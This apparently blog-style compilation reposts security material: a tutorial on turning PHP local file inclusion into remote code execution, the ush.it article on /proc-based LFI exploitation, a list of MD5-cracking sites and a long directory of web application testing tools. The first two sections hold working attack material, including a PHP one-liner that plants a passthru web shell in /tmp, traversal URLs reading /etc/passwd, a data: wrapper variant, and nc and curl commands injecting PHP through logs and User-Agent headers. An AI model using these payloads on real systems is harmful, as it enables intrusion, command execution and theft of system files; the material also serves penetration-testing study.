from.hell

I’ve been playing around a lot more with LFI attacks, because I think they’re more prevalent than I originally had expected. Last night I had cigars with one of the OWASP guys and I got to thinking that I should probably do a quick post about this. For those who aren’t clued in about LFI (local file include) attacks, it basically means that PHP is pulling in a file locally and running it (you see that happen a lot with flags like language=en where en represents a file called en.php). So an attack might look like:

http://www.example.com/index.php?language=../../../../../../etc/passwd%00

The null byte is to truncate anything at the end that the php file might be trying to append to the end of the file, like “.php” in “en.php” and so on. Although in that example password files aren’t PHP so it’s not helping you much beyond being able to read files off the file system. So the next step is finding the log files and injecting a PHP backdoor through a user agent or referring URL. There’s some problems with this depending on how you do it because Apache logs will escape quotes. Assuming you find a way around that (like using the error logs rather than the access logs) you can inject your PHP backdoor. Here’s my micro backdoor (thanks to Daniel Herrera for inspiration):

<?php $c=fopen('/tmp/g','w');fwrite($c,'<?php passthru($_GET["f"]);?>');?>

So now what this does is throw a PHP file into the /tmp directory (which is typically writable). More importantly that file can now be used to inject commands directly (in the example below it’s executing whoami):

http://www.example.com/index.php?language=../../../../../../tmp/g%00&f=whoami

If anyone has shorter/more effective LFI backdoor, please let me know and I’ll post them.

from comments:

I have a pretty effective LFI backdoor which won’t require any file loading at all!

Taking advantage of PHP’s RFC 2397 support (http://php.net/manual/en/wrappers.data.php), you can inject the PHP code you want executed directly into the URL. With that said, using your above example:

http://www.example.com/index.php?language=data:,?&cmd=whoami

I’ve tested it out using several methods, including the support for base64 encoding:

Using the base64 encoding, you may be able to shorten your injection pending that they have size restrictions.

Also notice above, when using $_GET[cmd], there aren’t any quotes used. This still works effectively and it comes in handy if the server has magic_quotes enabled

source: http://ha.ckers.org/blog/20100128/micro-php-lfi-backdoor/

This paper exposes the ability from the attacker standpoint to use /proc in order to exploit LFI (Local File Inclusion) vulnerabilities. While using /proc for such aim is well known this one is a specific technique that was not been previously published as far as we know. A tool to automatically exploit LFI using the shown approach is released accordingly.

Update: a third (known) technique has been dissected here: http://www.ush.it/2008/07/09/local-file-inclusion-lfi-of-session-files-to-root-escalation/

LFI2RCE advanced exploitation: /proc shortcuts

On UNIX systems, especially on Linux /proc is the preferred userspace
interface used for a number of things, especially process information.
This article will expose a technique that uses /proc/%{PID}/fd/%{FD_ID}
to implicitly find the location of the logfile containing the attacker’s
payload. Enjoy reading this article by kuza55 and ascii (-;

It’s known that LFI (Local File Inclusion) vulnerabilities can be
exploited in a way that converts them in RCE (Remote Code Execution).

The malicious payload must exist locally, on the filesystem, but since
the attacker is commonly not able to directly upload/create a file,
logs are used. By their intrinsic nature logfiles contain data
that is driven by users (eg: the log will contain user inputs of some
sort). Logfiles that don’t present this behaviour are not valid
candidates.

The trick is to make these logs contain a base payload that will be
later interpreted and executed when the logfile is included. This
technique itself is know from many years (milw0rm.com/exploits/34 is
dated 2003-05-29 but it’s even older).

On a UNIX system multiple logfiles can be used for this scope: xfer log
(“Transfer log”) using specially crafted filenames during FTP transfers,
fail.log using a crafted username and performing a failed login on the
FTP server, etc.

While the path of these files is almost always known (they stay in
/var/ with weak permissions, masked 022) the service could be not
present or unreachable from outside (think of an IP that exposes only
https?). For this reason access_log and error_log are the most used to
perform this type of attack since it’s auto-contained (uses only
resources provided by the webserver, a component that is hardly missing
in this scenario!).

If needed let few commands make things even clearer:

# echo -en "USER evil_payload\nPASS secr3t\n\n" | nc localhost 21
220 (vsFTPd 1.2.3)
331 Please specify the password.
530 Login incorrect.
530 Please login with USER and PASS.
$ cat /var/log/vsftpd.log
Thu Jul 10 02:33:22 2008 [pid 27931] CONNECT: Client "127.0.0.1"
Thu Jul 10 02:33:24 2008 [pid 27930] [evil_payload] FAIL LOGIN: Client "127.0.0.1"
$ curl "http://localhost/index.php?page=../../../var/log/vsftpd.log%00"


Note1: This general concept is often applied to PHP applications but is
valid also on other environments.

Note2: On Windows the story is similar and LFI2RCE conversions still
apply but obviously not the specific /proc technique presented.

To overcome the need to know the location of (access|error)_log (could be
guessable by bruteforcing against a list of known locations or obtained
from configuration files) it’s possible to directly access it by its
file descriptor entry in /proc (a symlink to the real location).

Warning! Achtung! Attenzione! This means that the proposed technique
can’t bypass any filesystem acl. It won’t magically exploit the target.
The “injected” logfile must be readable by the interpreter as in any
normal LFI (for example won’t work on Debian default vhost logs since
they are readable only by root).

Including /proc/31508/fd/5 the lstat64() and readlink() magic will
drive directly to the obscure and hard to guess location of access_log
(/home/www.example.com/private/.rawlogs/access.log in this example).

In this attack the only variables are the process ID of a disposable
apache thread/mod_* and the file descriptor number (with the first three
reserved for stdin,out,err). As said before the process ID must be the
one of some application with an open file descriptor to the target and
Apache satisfies this requirement, this means that in case of mod_* it’s
possible to directly use /proc/self since interpreter execution happens
inside Apache. When CGIs are used it’s possible to go back up to the
Apache PID reading the 4rd column /proc/self/stat (if necessary iterate).

Since mod_php is the common case /proc/self is normally enough to carry
a successful attack, this makes the process uninfluenced by the presence
of Grsec user only /proc for example.

The second variable was the file descriptor number and greatly depends
on the target setup and load since file descriptors can belong to a
range of resources like pipes, sockets and naturally files. Some of the
fd points to logfiles and only two of them are the ones of the target
vhost. At the moment of writing we are unaware of methods to directly
guess the right number but the tool attached to this document speeds up
the process and automatically gives hints on the logfile type and usage.

Note that fd to logfiles are the first opened by apache and this is
especially true for non threaded MPMs like prefork. In such condition
the right fd number mainly depends on the number of vhosts loaded before
the one containing the vulnerable application under attack.

As final attack the right /proc/self/fd/X will be included and the
injected payload executed.

While writing this article and trying to give a complete and accurate
information a paper came to our attention: “LOCAL FILE INCLUSIONS
by G-Brain” (http://www.g-brain.net/tutorials/local-file-inclusions.txt).

It exposes a similar and possibly better technique we were not aware
of that is self-contained (doesn’t require two different stages, one
to inject the payload in the log and one to actually include the
logfile) and non resilient (doesn’t leave any payload in logs).

Summarizing /proc/self/environ contains user inputs (like an env var
named HTTP_USER_AGENT containing the data specified in the User-Agent
request header) that turn it in a useful volatile storage for LFI2RCE
attacks. It also contains other user controlled data beyond UA.


curl "http://example.com/index.php?page=../../../proc/self/environ&cmd=ls"
-H "User-Agent: PHP_RCE: <?php passthru(\$_GET['cmd']) ?>"

The greatest advantage of this attack is that the whole path is static
and known, on the other side I had no luck in making it work on most of
my machines (Failed to open stream: Permission denied).

Now that you known the details of /proc LFI exploitation it’s time to
explain the disadvantages correlated to /proc and the setups exposed
techniques will not work.

Logfiles owned by root and readable only by root: this is the vanilla
setup (at least for Gentoo and Debian) for the default vhost. Experience
teaches us that additional vhosts are often configured manually and
differently. This is possible since the fd’s are opened before dropping
privileges.

Safe mode/openbasedir: if openbasedir is correctly configured /proc is
no more accessible, on the other side logfiles could reside in an
allowed path (ex: open_basedir=/home, access_log at
/home/www.example.com/logs/www_access.log). Note that mass vhoster
clone a “skeletor” when creating new users, so the path to logfiles
could be guessed also by subscribing to the service.

Chroot without proc: the interpreter could run inside a chroot, in this
case /proc could be unexisting or the files linked by proc unreachable.

Grsec user only /proc plus CGI setup: if the interpreter process
belongs to a specific user that is different from the one running Apache
it will be impossible to access /proc/apache_pid/*.

Theoretical details are over, time for the code! To demonstrate our
technique (LFI2RCE using /proc/self/fd) this demo tool has been coded,
it’s in bash, if that disgusts you feel free to convert it into your
favorite language (-;

The tool:

http://ush.it/team/ascii/hack-lfi2rce_proc/lfi2rce.sh

A nice demo for the impatients:

http://ush.it/team/ascii/hack-lfi2rce_proc/lfi2rce.demo.txt

* http://www.g-brain.net/tutorials/local-file-inclusions.txt
Last-Modified: Mon, 24 Mar 2008 12:52:49 GMT

A text version of the above article can be found here: http://ush.it/team/ascii/hack-lfi2rce_proc/lfi2rce.txt

source : http://www.ush.it/2008/08/18/lfi2rce-local-file-inclusion-to-remote-code-execution-advanced-exploitation-proc-shortcuts/

Just a list of online (mostly) md5 crackers but some with do others

This post over on pcsec got me thinking about them.

http://www.pcsec.org/archives/MD5Seacrh-v18-by-mass.html

Of course not all those are working, least not for me.

So here is that list with links and a few others thanks to my twitter homies

passcracking.ru http://passcracking.ru/
md5crack http://md5crack.com/
md5decryption: http://md5decryption.com/
TheKaine.de: http://md5.thekaine.de/
AuthSecu: http://authsecu.com/decrypter-dechiffrer-cracker-hash-md5/decrypter-dechiffrer-cracker-hash-md5.php

hackcrack: http://hashcrack.com/index.php
insidepro: http://hash.insidepro.com/
md5decrypter: http://md5decrypter.com/
md5pass.info: http://md5pass.info/

Bonus points for two of the sites from the screen shot just giving you a parallels plesk login.

Sites specifically mentioned to me in no particular order

Plain-Text.info http://plain-text.info/add/ (also has IRC support)

Hashkiller: http://hashkiller.com/password/
Cryptohaze: http://www.cryptohaze.com/addhashes.php
md5rednoize: http://md5.rednoize.com/
milw0rm: http://milw0rm.com/cracker/insert.php
GData: http://gdataonline.com/seekhash.php
c0llision: http://www.c0llision.net/webcrack.php (also has IRC support)

ISC: http://isc.sans.org/tools/reversehash.html

PassCracking http://passcracking.com/

Lastly, for fun, a metasploit module that submits the hash to md5crack.com and displays the password if its found.

msf auxiliary(md5check_md5crack) > run

[*] Sending 098f6bcd4621d373cade4e832627b4f6 hash to md5crack.com…
[*] plaintext md5 is: test
[*] Auxiliary module execution completed

I started to do more than just md5crack but writing regex’s for different sites just seemed like a waste of time.

http://carnal0wnage.attackresearch.com/sites/default/files/md5check_md5c… (rename to .rb)

repost from: http://carnal0wnage.attackresearch.com/node/402

LiveCDs

OWASP LiveCD Monday, January 29, 2007 4:02 PM 828569600 AOC_Labrat-ALPHA-0010.iso – http://www.packetfocus.com/hackos/
DVL (Damn Vulnerable Linux) – http://www.damnvulnerablelinux.org/
Test sites / testing grounds

SPI Dynamics (live) – http://zero.webappsecurity.com/
Cenzic (live) – http://crackme.cenzic.com/
Watchfire (live) – http://demo.testfire.net/
Acunetix (live) – http://testphp.acunetix.com/ http://testasp.acunetix.com http://testaspnet.acunetix.com
WebMaven / Buggy Bank – http://www.mavensecurity.com/webmaven
Foundstone SASS tools – http://www.foundstone.com/us/resources-free-tools.asp
Updated HackmeBank – http://www.o2-ounceopen.com/technical-info/2008/12/8/updated-version-of-hacmebank.html
OWASP WebGoat – http://www.owasp.org/index.php/OWASP_WebGoat_Project
OWASP SiteGenerator – http://www.owasp.org/index.php/Owasp_SiteGenerator
Stanford SecuriBench – http://suif.stanford.edu/~livshits/securibench/
SecuriBench Micro – http://suif.stanford.edu/~livshits/work/securibench-micro/
HTTP proxying / editing

WebScarab – http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project
Burp – http://www.portswigger.net/
Paros – http://www.parosproxy.org/
Fiddler – http://www.fiddlertool.com/
Web Proxy Editor – http://www.microsoft.com/mspress/companion/0-7356-2187-X/
Pantera – http://www.owasp.org/index.php/Category:OWASP_Pantera_Web_Assessment_Studio_Project
Suru – http://www.sensepost.com/research/suru/
httpedit (curses-based) – http://www.neutralbit.com/en/rd/httpedit/
Charles – http://www.xk72.com/charles/
Odysseus – http://www.bindshell.net/tools/odysseus
Burp, Paros, and WebScarab for Mac OS X – http://www.corsaire.com/downloads/
Web-application scanning tool from `Network Security Tools’/O’Reilly – http://examples.oreilly.com/networkst/
JS Commander – http://jscmd.rubyforge.org/
Ratproxy – http://code.google.com/p/ratproxy/
RSnake’s XSS cheat sheet based-tools, webapp fuzzing, and encoding tools

Wfuzz – http://www.edge-security.com/wfuzz.php
ProxMon – http://www.isecpartners.com/proxmon.html
Wapiti – http://wapiti.sourceforge.net/
Grabber – http://rgaucher.info/beta/grabber/
XSSScan – http://darkcode.ath.cx/scanners/XSSscan.py
CAL9000 – http://www.owasp.org/index.php/Category:OWASP_CAL9000_Project
HTMangLe – http://www.fishnetsecurity.com/Tools/HTMangLe/publish.htm
JBroFuzz – http://sourceforge.net/projects/jbrofuzz
XSSFuzz – http://ha.ckers.org/blog/20060921/xssfuzz-released/
WhiteAcid’s XSS Assistant – http://www.whiteacid.org/greasemonkey/
Overlong UTF – http://www.microsoft.com/mspress/companion/0-7356-2187-X/
[TGZ] MielieTool (SensePost Research) – http://packetstormsecurity.org/UNIX/utilities/mielietools-v1.0.tgz
RegFuzzer: test your regular expression filter – http://rgaucher.info/b/index.php/post/2007/05/26/RegFuzzer%3A-Test-your-regular-expression-filter
screamingCobra – http://www.dachb0den.com/projects/screamingcobra.html
SPIKE and SPIKE Proxy – http://immunitysec.com/resources-freesoftware.shtml
RFuzz – http://rfuzz.rubyforge.org/
WebFuzz – http://www.codebreakers-journal.com/index.php?option=com_content&task=view&id=112&Itemid=99999999
TestMaker – http://www.pushtotest.com/Docs/downloads/features.html
ASP Auditor – http://michaeldaw.org/projects/asp-auditor-v2/
WSTool – http://wstool.sourceforge.net/
Web Hack Control Center (WHCC) – http://ussysadmin.com/whcc/
Web Text Converter – http://www.microsoft.com/mspress/companion/0-7356-2187-X/
HackBar (Firefox Add-on) – https://addons.mozilla.org/firefox/3899/
Net-Force Tools (NF-Tools, Firefox Add-on) – http://www.net-force.nl/library/downloads/
PostIntercepter (Greasemonkey script) – http://userscripts.org/scripts/show/743
HTTP general testing / fingerprinting

Wbox: HTTP testing tool – http://hping.org/wbox/
ht://Check – http://htcheck.sourceforge.net/
Mumsie – http://www.lurhq.com/tools/mumsie.html
WebInject – http://www.webinject.org/
Torture.pl Home Page – http://stein.cshl.org/~lstein/torture/
JoeDog’s Seige – http://www.joedog.org/JoeDog/Siege/
OPEN-LABS: metoscan (http method testing) – http://www.open-labs.org/
Load-balancing detector – http://ge.mine.nu/lbd.html
HMAP – http://ujeni.murkyroc.com/hmap/
Net-Square: httprint – http://net-square.com/httprint/
Wpoison: http stress testing – http://wpoison.sourceforge.net/
Net-square: MSNPawn – http://net-square.com/msnpawn/index.shtml
hcraft: HTTP Vuln Request Crafter – http://druid.caughq.org/projects/hcraft/
rfp.labs: LibWhisker – http://www.wiretrip.net/rfp/lw.asp
Nikto – http://www.cirt.net/code/nikto.shtml
twill – http://twill.idyll.org/
DirBuster – http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
[ZIP] DFF Scanner – http://security-net.biz/files/dff/DFF.zip
[ZIP] The Elza project – http://packetstormsecurity.org/web/elza-1.4.7-beta.zip http://www.stoev.org/elza.html
HackerFox and Hacking Addons Bundled: Portable Firefox with web hacking addons bundled – http://sf.net/projects/hackfox
Browser-based HTTP tampering / editing / replaying

TamperIE – http://www.bayden.com/Other/
isr-form – http://www.infobyte.com.ar/developments.html
Modify Headers (Firefox Add-on) – http://modifyheaders.mozdev.org/
Tamper Data (Firefox Add-on) – http://tamperdata.mozdev.org/
UrlParams (Firefox Add-on) – https://addons.mozilla.org/en-US/firefox/addon/1290/
TestGen4Web (Firefox Add-on) – https://addons.mozilla.org/en-US/firefox/addon/1385/
DOM Inspector / Inspect This (Firefox Add-on) – https://addons.mozilla.org/en-US/firefox/addon/1806/ https://addons.mozilla.org/en-US/firefox/addon/1913/
LiveHTTPHeaders / Header Monitor (Firefox Add-on) – http://livehttpheaders.mozdev.org/ https://addons.mozilla.org/en-US/firefox/addon/575/
Cookie editing / poisoning

[TGZ] stompy: session id tool – http://lcamtuf.coredump.cx/stompy.tgz
Add’N Edit Cookies (AnEC, Firefox Add-on) – http://addneditcookies.mozdev.org/
CookieCuller (Firefox Add-on) – http://cookieculler.mozdev.org/
CookiePie (Firefox Add-on) – http://www.nektra.com/oss/firefox/extensions/cookiepie/
CookieSpy – http://www.codeproject.com/shell/cookiespy.asp
Cookies Explorer – http://www.dutchduck.com/Features/Cookies.aspx
Ajax and XHR scanning

Sahi – http://sahi.co.in/
scRUBYt – http://scrubyt.org/
jQuery – http://jquery.com/
jquery-include – http://www.gnucitizen.org/projects/jquery-include
Sprajax – http://www.denimgroup.com/sprajax.html
Watir – http://wtr.rubyforge.org/
Watij – http://watij.com/
Watin – http://watin.sourceforge.net/
RBNarcissus – http://idontsmoke.co.uk/2005/rbnarcissus/
SpiderTest (Spider Fuzz plugin) – http://blog.caboo.se/articles/2007/2/21/the-fabulous-spider-fuzz-plugin
Javascript Inline Debugger (jasildbg) – http://jasildbg.googlepages.com/
Firebug Lite – http://www.getfirebug.com/lite.html
firewaitr – http://code.google.com/p/firewatir/
RSS extensions and caching

LiveLines (Firefox Add-on) – https://addons.mozilla.org/en-US/firefox/addon/324/
rss-cache – http://www.dubfire.net/chris/projects/rss-cache/
SQL injection scanning

0×90.org: home of Absinthe, Mezcal, etc – http://0×90.org/releases.php
SQLiX – http://www.owasp.org/index.php/Category:OWASP_SQLiX_Project
sqlninja: a SQL Server injection and takover tool – http://sqlninja.sourceforge.net/
JustinClarke’s SQL Brute – http://www.justinclarke.com/archives/2006/03/sqlbrute.html
BobCat – http://www.northern-monkee.co.uk/projects/bobcat/bobcat.html
sqlmap – http://sqlmap.sourceforge.net/
Scully: SQL Server DB Front-End and Brute-Forcer – http://www.sensepost.com/research/scully/
FG-Injector – http://www.flowgate.net/?lang=en&seccion=herramientas
PRIAMOS – http://www.priamos-project.com/
Web application security malware, backdoors, and evil code

W3AF: Web Application Attack and Audit Framework – http://w3af.sourceforge.net/
Jikto – http://busin3ss.name/jikto-in-the-wild/
XSS Shell – http://ferruh.mavituna.com/article/?1338
XSS-Proxy – http://xss-proxy.sourceforge.net
AttackAPI – http://www.gnucitizen.org/projects/attackapi/
FFsniFF – http://azurit.elbiahosting.sk/ffsniff/
HoneyBlog’s web-based junkyard – http://honeyblog.org/junkyard/web-based/
BeEF – http://www.bindshell.net/tools/beef/
Firefox Extension Scanner (FEX) – http://www.gnucitizen.org/projects/fex/
What is my IP address? – http://reglos.de/myaddress/
xRumer: blogspam automation tool – http://www.botmaster.net/movies/XFull.htm
SpyJax – http://www.merchantos.com/makebeta/tools/spyjax/
Greasecarnaval – http://www.gnucitizen.org/projects/greasecarnaval
Technika – http://www.gnucitizen.org/projects/technika/
Load-AttackAPI bookmarklet – http://www.gnucitizen.org/projects/load-attackapi-bookmarklet
MD’s Projects: JS port scanner, pinger, backdoors, etc – http://michaeldaw.org/my-projects/
Web application services that aid in web application security assessment

Netcraft – http://www.netcraft.net
AboutURL – http://www.abouturl.com/
The Scrutinizer – http://www.scrutinizethis.com/
net.toolkit – http://clez.net/
ServerSniff – http://www.serversniff.net/
Online Microsoft script decoder – http://www.greymagic.com/security/tools/decoder/
Webmaster-Toolkit – http://www.webmaster-toolkit.com/
myIPNeighbbors, et al – http://digg.com/security/MyIPNeighbors_Find_Out_Who_Else_is_Hosted_on_Your_Site_s_IP_Address
PHP charset encoding – http://h4k.in/encoding
data: URL testcases – http://h4k.in/dataurl
Browser-based security fuzzing / checking

Zalewski’s MangleMe – http://lcamtuf.coredump.cx/mangleme/mangle.cgi
hdm’s tools: Hamachi, CSSDIE, DOM-Hanoi, AxMan – http://metasploit.com/users/hdm/tools/
Peach Fuzzer Framework – http://peachfuzz.sourceforge.net/
TagBruteForcer – http://research.eeye.com/html/tools/RT20060801-3.html
PROTOS Test-Suite: c05-http-reply – http://www.ee.oulu.fi/research/ouspg/protos/testing/c05/http-reply/index.html
COMRaider – http://labs.idefense.com
bcheck – http://bcheck.scanit.be/bcheck/
Stop-Phishing: Projects page – http://www.indiana.edu/~phishing/?projects
LinkScanner – http://linkscanner.explabs.com/linkscanner/default.asp
BrowserCheck – http://www.heise-security.co.uk/services/browsercheck/
Cross-browser Exploit Tests – http://www.jungsonnstudios.com/cool.php
Stealing information using DNS pinning demo – http://www.jumperz.net/index.php?i=2&a=1&b=7
Javascript Website Login Checker – http://ha.ckers.org/weird/javascript-website-login-checker.html
Mozilla Activex – http://www.iol.ie/~locka/mozilla/mozilla.htm
Jungsonn’s Black Dragon Project – http://blackdragon.jungsonnstudios.com/
Mr. T (Master Recon Tool, includes Read Firefox Settings PoC) – http://ha.ckers.org/mr-t/
Vulnerable Adobe Plugin Detection For UXSS PoC – http://www.0×000000.com/?i=324
About Flash: is your flash up-to-date? – http://www.macromedia.com/software/flash/about/
Test your installation of Java software – http://java.com/en/download/installed.jsp?detect=jre&try=1
WebPageFingerprint – Light-weight Greasemonkey Fuzzer – http://userscripts.org/scripts/show/30285
PHP static analysis and file inclusion scanning

PHP-SAT.org: Static analysis for PHP – http://www.program-transformation.org/PHP/
Unl0ck Research Team: tool for searching in google for include bugs – http://unl0ck.net/tools.php
FIS: File Inclusion Scanner – http://www.segfault.gr/index.php?cat_id=3&cont_id=25
PHPSecAudit – http://developer.spikesource.com/projects/phpsecaudit
PHP Defensive Tools

PHPInfoSec – Check phpinfo configuration for security – http://phpsec.org/projects/phpsecinfo/

A Greasemonkey Replacement can be found at http://yehg.net/lab/#tools.greasemonkey

Php-Brute-Force-Attack Detector – Detect your web servers being scanned by brute force tools such as WFuzz, OWASP DirBuster and vulnerability scanners such as Nessus, Nikto, Acunetix ..etc. http://yehg.net/lab/pr0js/files.php/php_brute_force_detect.zip

PHP-Login-Info-Checker – Strictly enforce admins/users to select stronger passwords. It tests cracking passwords against 4 rules. It has also built-in smoke test page via url loginfo_checker.php?testlic

http://yehg.net/lab/pr0js/files.php/loginfo_checkerv0.1.zip

http://yehg.net/lab/pr0js/files.php/phploginfo_checker_demo.zip

php-DDOS-Shield – A tricky script to prevent idiot distributed bots which discontinue their flooding attacks by identifying HTTP 503 header code. http://code.google.com/p/ddos-shield/

PHPMySpamFIGHTER – http://yehg.net/lab/pr0js/files.php/phpmyspamfighter.zip http://yehg.net/lab/pr0js/files.php/phpMySpamFighter_demo.rar
Web Application Firewall (WAF) and Intrusion Detection (APIDS) rules and resources

APIDS on Wikipedia – http://en.wikipedia.org/wiki/APIDS
PHP Intrusion Detection System (PHP-IDS) – http://php-ids.org/ http://code.google.com/p/phpids/
dotnetids – http://code.google.com/p/dotnetids/
Secure Science InterScout – http://www.securescience.com/home/newsandevents/news/interscout1.0.html
Remo: whitelist rule editor for mod_security – http://remo.netnea.com/
GotRoot: ModSecuirty rules – http://www.gotroot.com/tiki-index.php?page=mod_security+rules
The Web Security Gateway (WSGW) – http://wsgw.sourceforge.net/
mod_security rules generator – http://noeljackson.com/tools/modsecurity/
Mod_Anti_Tamper – http://www.wisec.it/projects.php?id=3
[TGZ] Automatic Rules Generation for Mod_Security – http://www.wisec.it/rdr.php?fn=/Projects/Rule-o-matic.tgz
AQTRONIX WebKnight – http://www.aqtronix.com/?PageID=99
Akismet: blog spam defense – http://akismet.com/
Samoa: Formal tools for securing web services – http://research.microsoft.com/projects/samoa/
Web services enumeration / scanning / fuzzing

WebServiceStudio2.0 – http://www.codeplex.com/WebserviceStudio
Net-square: wsChess – http://net-square.com/wschess/index.shtml
WSFuzzer – http://www.owasp.org/index.php/Category:OWASP_WSFuzzer_Project
SIFT: web method search tool – http://www.sift.com.au/73/171/sift-web-method-search-tool.htm
iSecPartners: WSMap, WSBang, etc – http://www.isecpartners.com/tools.html
Web application non-specific static source-code analysis

Pixy: a static analysis tool for detecting XSS vulnerabilities – http://www.seclab.tuwien.ac.at/projects/pixy/
Brixoft.Net: Source Edit – http://www.brixoft.net/prodinfo.asp?id=1
Security compass web application auditing tools (SWAAT) – http://www.owasp.org/index.php/Category:OWASP_SWAAT_Project
An even more complete list here – http://www.cs.cmu.edu/~aldrich/courses/654/tools/
A nice list that claims some demos available – http://www.cs.cmu.edu/~aldrich/courses/413/tools.html
A smaller, but also good list – http://spinroot.com/static/
Yasca: A highly extensible source code analysis framework; incorporates several analysis tools into one package. http://www.yasca.org/
Static analysis for C/C++ (CGI, ISAPI, etc) in web applications

RATS – http://www.securesoftware.com/resources/download_rats.html
ITS4 – http://www.cigital.com/its4/
FlawFinder – http://www.dwheeler.com/flawfinder/
Splint – http://www.splint.org/
Uno – http://spinroot.com/uno/
BOON (Buffer Overrun detectiON) – http://www.cs.berkeley.edu/~daw/boon/ http://boon.sourceforge.net
Valgrind – http://www.valgrind.org/
Java static analysis, security frameworks, and web application security tools

LAPSE – http://suif.stanford.edu/~livshits/work/lapse/
HDIV Struts – http://hdiv.org/
Orizon – http://sourceforge.net/projects/orizon/
FindBugs: Find bugs in Java programs – http://findbugs.sourceforge.net/
PMD – http://pmd.sourceforge.net/
CUTE: A Concolic Unit Testing Engine for C and Java – http://osl.cs.uiuc.edu/~ksen/cute/
EMMA – http://emma.sourceforge.net/
JLint – http://jlint.sourceforge.net/
Java PathFinder – http://javapathfinder.sourceforge.net/
Fujaba: Move between UML and Java source code – http://wwwcs.uni-paderborn.de/cs/fujaba/
Checkstyle – http://checkstyle.sourceforge.net/
Cookie Revolver Security Framework – http://sourceforge.net/projects/cookie-revolver
tinapoc – http://sourceforge.net/projects/tinapoc
jarsigner – http://java.sun.com/j2se/1.5.0/docs/tooldocs/solaris/jarsigner.html
Solex – http://solex.sourceforge.net/
Java Explorer – http://metal.hurlant.com/jexplore/
HTTPClient – http://www.innovation.ch/java/HTTPClient/
another HttpClient – http://jakarta.apache.org/commons/httpclient/
a list of code coverage and analysis tools for Java – http://mythinkpond.blogspot.com/2007/06/java-foss-freeopen-source-software.html
Microsoft .NET static analysis and security framework tools, mostly for ASP.NET and ASP.NET AJAX, but also C# and VB.NET

* Visual Studio 2008 Code Analysis, available in:
o VSTS 2008 Development Edition (http://msdn.microsoft.com/vsts2008/products/bb933752.aspx) and
o VSTS 2008 Team Suite (http://msdn.microsoft.com/vsts2008/products/bb933735.aspx)
* Visual Studio 2005 Code Analyzer, available in:
o Visual Studio 2005 Team Edition for Software Developers (http://msdn.microsoft.com/en-us/vstudio/aa718806.aspx)
o Visual Studio 2005 Team Suite (http://msdn.microsoft.com/en-us/vstudio/aa718806.aspx)
* Web Development Helper – http://www.nikhilk.net/Project.WebDevHelper.aspx
* FxCop:
o (blog) http://blogs.msdn.com/fxcop/
o (download) http://code.msdn.microsoft.com/codeanalysis
* Microsoft internal tools you can’t have yet:
o http://www.microsoft.com/windows/cse/pa_projects.mspx
o http://research.microsoft.com/Pex/
o http://www.owasp.org/images/5/5b/OWASP_IL_7_FuzzGuru.pdf

Threat modeling

Microsoft Threat Analysis and Modeling Tool v2.1 (TAM) – http://www.microsoft.com/downloads/details.aspx?FamilyID=59888078-9daf-4e96-b7d1-944703479451&displaylang=en
Amenaza: Attack Tree Modeling (SecurITree) – http://www.amenaza.com/software.php
Octotrike – http://www.octotrike.org/
Add-ons for Firefox that help with general web application security

Web Developer Toolbar – https://addons.mozilla.org/firefox/60/
Plain Old Webserver (POW) – https://addons.mozilla.org/firefox/3002/
XML Developer Toolbar – https://addons.mozilla.org/firefox/2897/
Public Fox – https://addons.mozilla.org/firefox/3911/
XForms Buddy – http://beaufour.dk/index.php?sec=misc&pagename=xforms
MR Tech Local Install – http://www.mrtech.com/extensions/local_install/
Nightly Tester Tools – http://users.blueprintit.co.uk/~dave/web/firefox/buildid/index.html
IE Tab – https://addons.mozilla.org/firefox/1419/
User-Agent Switcher – https://addons.mozilla.org/firefox/59/
ServerSwitcher – https://addons.mozilla.org/firefox/2409/
HeaderMonitor – https://addons.mozilla.org/firefox/575/
RefControl – https://addons.mozilla.org/firefox/953/
refspoof – https://addons.mozilla.org/firefox/667/
No-Referrer – https://addons.mozilla.org/firefox/1999/
LocationBar^2 – https://addons.mozilla.org/firefox/4014/
SpiderZilla – http://spiderzilla.mozdev.org/
Slogger – https://addons.mozilla.org/en-US/firefox/addon/143
Fire Encrypter – https://addons.mozilla.org/firefox/3208/
Add-ons for Firefox that help with Javascript and Ajax web application security

Selenium IDE – http://www.openqa.org/selenium-ide/
Firebug – http://www.joehewitt.com/software/firebug/
Venkman – http://www.mozilla.org/projects/venkman/
Chickenfoot – http://groups.csail.mit.edu/uid/chickenfoot/
Greasemonkey – http://www.greasespot.net/
Greasemonkey compiler – http://www.letitblog.com/greasemonkey-compiler/
User script compiler – http://arantius.com/misc/greasemonkey/script-compiler
Extension Developer’s Extension (Firefox Add-on) – http://ted.mielczarek.org/code/mozilla/extensiondev/
Smart Middle Click (Firefox Add-on) – https://addons.mozilla.org/en-US/firefox/addon/3885/
Bookmarklets that aid in web application security

RSnake’s security bookmarklets – http://ha.ckers.org/bookmarklets.html
BMlets – http://optools.awardspace.com/bmlet.html
Huge list of bookmarklets – http://www.squarefree.com/bookmarklets/
Blummy: consists of small widgets, called blummlets, which make use of Javascript to provide rich functionality – http://www.blummy.com/
Bookmarklets every blogger should have – http://www.micropersuasion.com/2005/10/bookmarklets_ev.html
Flat Bookmark Editing (Firefox Add-on) – http://n01se.net/chouser/proj/mozhack/
OpenBook and Update Bookmark (Firefox Add-ons) – http://www.chuonthis.com/extensions/
SSL certificate checking / scanning

SSL Labs – https://www.ssllabs.com/ssldb/
[ZIP] THCSSLCheck – http://thc.org/root/tools/THCSSLCheck.zip
[ZIP] Foundstone SSLDigger – http://www.foundstone.com/us/resources/termsofuse.asp?file=ssldigger.zip
Cert Viewer Plus (Firefox Add-on) – https://addons.mozilla.org/firefox/1964/
Honeyclients, Web Application, and Web Proxy honeypots

Honeyclient Project: an open-source honeyclient – http://www.honeyclient.org/trac/
HoneyC: the low-interaction honeyclient – http://honeyc.sourceforge.net/
Capture: a high-interaction honeyclient – http://capture-hpc.sourceforge.net/
Google Hack Honeypot – http://ghh.sourceforge.net/
PHP.Hop – PHP Honeynet Project – http://www.rstack.org/phphop/
SpyBye – http://www.monkey.org/~provos/spybye/
Honeytokens – http://www.securityfocus.com/infocus/1713
Blackhat SEO and maybe some whitehat SEO

SearchStatus (Firefox Add-on) – http://www.quirk.biz/searchstatus/
SEO for Firefox (Firefox Add-on) – http://tools.seobook.com/firefox/seo-for-firefox.html
SEOQuake (Firefox Add-on) – http://www.seoquake.com/
Footprinting for web application security

Evolution – http://www.paterva.com/evolution-e.html
GooSweep – http://www.mcgrewsecurity.com/projects/goosweep/
Aura: Google API Utility Tools – http://www.sensepost.com/research/aura/
Edge-Security tools – http://www.edge-security.com/soft.php
Fierce Domain Scanner – http://ha.ckers.org/fierce/
